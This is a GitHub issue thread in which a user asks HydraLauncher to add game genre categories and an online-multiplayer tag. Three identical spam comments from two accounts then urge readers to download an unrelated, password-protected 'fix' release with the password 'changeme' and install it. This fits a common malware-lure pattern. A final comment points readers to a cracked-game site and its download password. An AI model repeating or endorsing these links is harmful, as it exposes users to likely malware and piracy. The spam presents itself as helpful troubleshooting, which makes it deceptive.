### ISSUE TITLE
[REQUEST] Add Game Categories and Online Support Information

### ISSUE THREAD

**Issue by AlmigthyMatheus** [hydralauncher/hydra#923]
### Is your feature request related to a problem? Please describe.

No, this feature request is not related to a specific problem. However, it aims to enhance the user experience by providing additional information about games in the HydraLauncher, such as their categories (genre) and whether they support online play. This would make it easier for users to find and select games based on their preferences.

### Describe the solution you'd like

I would like to see the implementation of two new features in the HydraLauncher:

1. **Game Categories:**  
   Add a way to categorize games by genre, such as action, adventure, puzzle, etc. This would help users filter and find games that match their interests more efficiently.

2. **Online Support Information:**  
   Introduce an indicator or tag that shows whether a game supports online multiplayer. This would allow users to quickly identify games they can play with friends or others online.

### Describe alternatives you've considered

One alternative could be to allow users to manually tag games with this information, but this might lead to inconsistencies. A more structured approach where this information is standardized within the launcher would likely provide a better user experience.

### Additional context

These features would align well with the current functionalities of HydraLauncher and could be implemented as optional metadata fields within the launcher’s game library interface. This addition would also support users who prioritize online gaming or who prefer specific genres, making the platform more user-friendly and versatile.

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by JoaozimBr2016** [comment]
Yo, this has been around for a while. Everything about it online says it's fix, and you can play with your friends. When you download it, it uses Steam to let you game with your buddies. The password for downloading the games from online fix is online-fix.me.
